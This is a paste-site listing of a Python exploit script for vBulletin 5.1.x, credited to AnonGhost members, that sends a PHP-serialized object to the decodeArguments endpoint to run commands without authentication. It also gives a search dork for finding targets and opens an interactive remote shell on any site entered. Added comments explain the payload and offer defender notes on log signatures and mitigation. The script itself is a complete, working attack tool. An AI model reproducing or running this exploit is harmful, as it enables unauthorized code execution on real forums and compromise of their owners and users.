Mauritania_Attacker

vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit

Nov 12th, 2015
  1. #Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
  2. #Date: 11-10-2015
  3. #Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
  4. #Requirements: Python 3.4.x or higher, install Requests and parse Module.
  5. #Description: We are not the authors of this exploit; we only fixed it and coded this script (Mauritania Attacker & Th3Falcon)
  6.  
  7. import  requests, re, sys
  8. import  parse as   urlparse  #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
  9.  
  10. def banner():
          # Print the tool's fixed start-up banner to stdout; takes no arguments
          # and returns None. Each print('\n') emits two newlines (the literal
          # plus print's own line ending), so the banner is padded above and below.
  11.     print( '\n' )
  12.     print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
  13.     print( '               VBulletin 5.1.x RCE auto Exploiter Priv8             ' )
  14.     print( '                 GreetZ To All AnonGhost Members                    ' )
  15.     print( '                 Coded by Mauritania Attacker & Th3Falcon           ' )
  16.     print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
  17.     print( '\n' )
  18.  
  19. def inject( ghost ):
          # Probe the base URL `ghost` and, if the probe answers, fingerprint the host.
          #
          # Both requests are GETs to <ghost>/ajax/api/hook/decodeArguments whose
          # `arguments` query value is a PHP-serialized vB_dB_Result object. Its
          # nested vB_Database object maps `free_result` to `system`, and the
          # `recordset` string carries the shell command. `%00*%00` is the
          # URL-encoded NUL*NUL prefix PHP puts on protected property names.
          # Presumably the endpoint unserializes this value server-side; the page
          # title describes the result as pre-auth remote code execution.
          #
          # Returns the fourth ':::'-separated field of the second response (the
          # `pwd` output), or '' on any failure.
          #
          # Defender notes:
          #   - The route and the whole serialized object travel in the URL, so
          #     access logs that keep query strings record every attempt. Look for
          #     decodeArguments requests whose `arguments` value starts with `O:`
          #     or names vB_dB_Result / vB_Database / free_result.
          #   - `echo Th3Falcon` and the `whoami;echo :::;id;...` chain are fixed
          #     strings of this script; they identify this tool only, so match on
          #     the object structure rather than on the commands.
          #   - Mitigation: move to a vBulletin release the vendor lists as fixed
          #     for this issue; until then, deny the route or reject object-typed
          #     `arguments` values at the reverse proxy / WAF.
  20.     url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
  21.     try:
              # Request 1: harmless marker command; 50-second timeout.
  22.         r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
              # Success needs the marker in the body AND a body under 50 characters;
              # presumably the length cap excludes pages that merely reflect the
              # query string -- confirm against real responses.
  23.         if 'Th3Falcon' in r.text and len( r.text ) < 50:
  24.             try:
                      # Request 2: four commands joined by `echo :::` so the output
                      # can be split into fields.
  25.                 r   = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
                      # NOTE(review): the labels do not match the command order --
                      # field 0 is `whoami` output (printed as GROUP) and field 1 is
                      # `id` output (printed as USER).
  26.                 print( '     [+] GROUP   :  ' + r.text.split( ':::' )[0].strip() )
  27.                 print( '     [+] USER    :  ' + r.text.split( ':::' )[1].strip() )
  28.                 print( '     [+] KERNEL  :  ' + r.text.split( ':::' )[2].strip() )
  29.                 print( '     [+] DIR     :  ' + r.text.split( ':::' )[3].strip() )
  30.                 sys.stdout.flush()
  31.                 return r.text.split( ':::' )[3].strip();
                  # Bare except: any error here, including IndexError when the
                  # response has fewer than four fields, silently returns ''.
  32.             except:
  33.                 return ''
  34.         else:
  35.             return ''
          # Bare except: every failure of the first request (DNS, TLS, timeout,
          # malformed URL, ...) is reported with the same message.
  36.     except:
  37.         print('     [+] Problem while exploiting..')
  38.         return ''
  39.  
  40. def bash(ghost, command):
          # Send one operator-supplied command to `ghost` and print the raw response.
          #
          # Builds the same serialized vB_dB_Result object as inject(), with
          # `command` spliced in as the `recordset` string and str(len(command)) as
          # its length prefix. Returns None.
          #
          # No exception handling: a requests error (timeout, connection failure)
          # propagates to the caller.
          #
          # Defender note: every command is a separate GET to the decodeArguments
          # route with the command text inside the query string, so a web server or
          # proxy log that keeps full request URIs holds the sequence of commands
          # issued through this tool -- useful when reconstructing an intrusion.
  41.     url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
  42.     r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
  43.     print(r.text)
  44.  
  45. def main():
          # Interactive driver: print the banner, then repeatedly read a base URL
          # from stdin, probe it with inject(), and on success forward each typed
          # line to bash() until the operator types 'exit'.
          #
          # Typing 'exit' at the command prompt returns to the 'Target : ' prompt;
          # typing it there ends the program. Both `while` conditions are backed by
          # an explicit `break`, so the loop tests themselves never decide the exit.
  46.     banner()
  47.     site = ''
  48.     while site != 'exit':
  49.         site = input('Target : ')
  50.         if site == 'exit':
  51.             break
              # inject() returns the remote working directory on success and ''
              # otherwise; the value is used here only as a success flag.
  52.         mad = inject(site)
  53.         if mad != '' :
  54.            
  55.             print('     [+] @Connection Successfully established... \n')
  56.             userinput = ''
  57.             while userinput != 'exit':
  58.                 userinput = input("AnonGhost@Target :")
  59.                 if userinput == 'exit':
  60.                     break
                      # bash() has no error handling, so a network error raised
                      # here ends the whole program with a traceback.
  61.                 bash(site, userinput)
  62.         else:
                  # Printed for every '' result from inject(), including network
                  # errors, so the message does not establish that a site is patched.
  63.             print('     [+] Website is not Vulnerable :(')
  64.  
  65. if __name__ == '__main__':
          # Start the interactive loop only when the file is run as a script,
          # not when it is imported.
  66.     main()
  67.  
  68. #D0ne
  69. #./Mauritania Attacker
  70. #./Th3Falcon
  71. #GreetZ To All AnonGhost MemberZ